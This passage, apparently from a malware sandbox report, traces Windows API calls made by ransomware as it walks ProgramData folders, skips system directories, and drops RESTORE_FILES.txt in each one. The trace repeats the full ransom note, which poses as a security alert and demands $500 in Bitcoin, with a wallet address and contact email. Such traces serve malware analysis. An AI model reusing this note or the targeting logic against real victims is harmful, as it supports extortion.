(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.571] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.571] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.571] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.571] CloseHandle (hObject=0xa4) returned 1 [0071.571] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="Windows") returned -1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="Program Files") returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="Program Files (x86)") returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="$Recycle.bin") returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="System Volume Information") returned 1 [0071.571] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO") returned 34 [0071.571] lstrcmpW (lpString1="VISIO", lpString2=".") returned 1 [0071.571] lstrcmpW (lpString1="VISIO", lpString2="..") returned 1 [0071.571] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*") returned 36 [0071.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.572] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.572] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.572] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.572] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.572] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\.") returned 36 [0071.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.572] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.572] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.572] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.572] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.572] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.572] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\..") returned 37 [0071.572] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.573] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.573] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.573] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\RESTORE_FILES.txt") returned 52 [0071.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\visio\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.573] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.573] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.574] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.574] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.574] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.574] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.574] CloseHandle (hObject=0xa4) returned 1 [0071.574] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.574] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0071.574] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="Windows") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files (x86)") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="$Recycle.bin") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="System Volume Information") returned 1 [0071.574] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned 45 [0071.574] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0071.574] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0071.574] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*") returned 47 [0071.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.576] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.576] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.576] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.576] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\.") returned 47 [0071.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.576] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.576] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.576] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.576] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.576] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.576] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.576] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\..") returned 48 [0071.576] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.576] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="Windows") returned -1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files") returned -1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files (x86)") returned -1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="$Recycle.bin") returned 1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="System Volume Information") returned -1 [0071.576] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned 64 [0071.576] lstrcmpW (lpString1="Definition Updates", lpString2=".") returned 1 [0071.576] lstrcmpW (lpString1="Definition Updates", lpString2="..") returned 1 [0071.576] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*") returned 66 [0071.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.577] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.577] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.577] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.577] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.577] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.577] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\.") returned 66 [0071.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.577] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.577] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.577] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.577] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.577] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.577] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\..") returned 67 [0071.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.577] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0071.577] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 71 [0071.577] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0071.577] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned 73 [0071.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.578] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.578] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.578] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.578] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.578] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\.") returned 73 [0071.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.578] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.578] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.578] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.578] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.578] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.578] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\..") returned 74 [0071.578] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.578] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.578] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.578] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt") returned 89 [0071.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.579] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.579] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.579] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.579] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.579] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.579] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.580] CloseHandle (hObject=0xd4) returned 1 [0071.580] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="Windows") returned -1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="Program Files") returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="Program Files (x86)") returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="$Recycle.bin") returned 1 [0071.580] lstrcmpiW (lpString1="Updates", lpString2="System Volume Information") returned 1 [0071.580] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 72 [0071.580] lstrcmpW (lpString1="Updates", lpString2=".") returned 1 [0071.580] lstrcmpW (lpString1="Updates", lpString2="..") returned 1 [0071.580] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned 74 [0071.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.580] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.580] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.580] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.581] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.581] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.581] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\.") returned 74 [0071.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.581] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.581] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.581] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.581] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.581] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.581] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.581] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\..") returned 75 [0071.581] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.581] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.581] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.581] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt") returned 90 [0071.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.582] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.582] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.582] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.582] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.582] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write 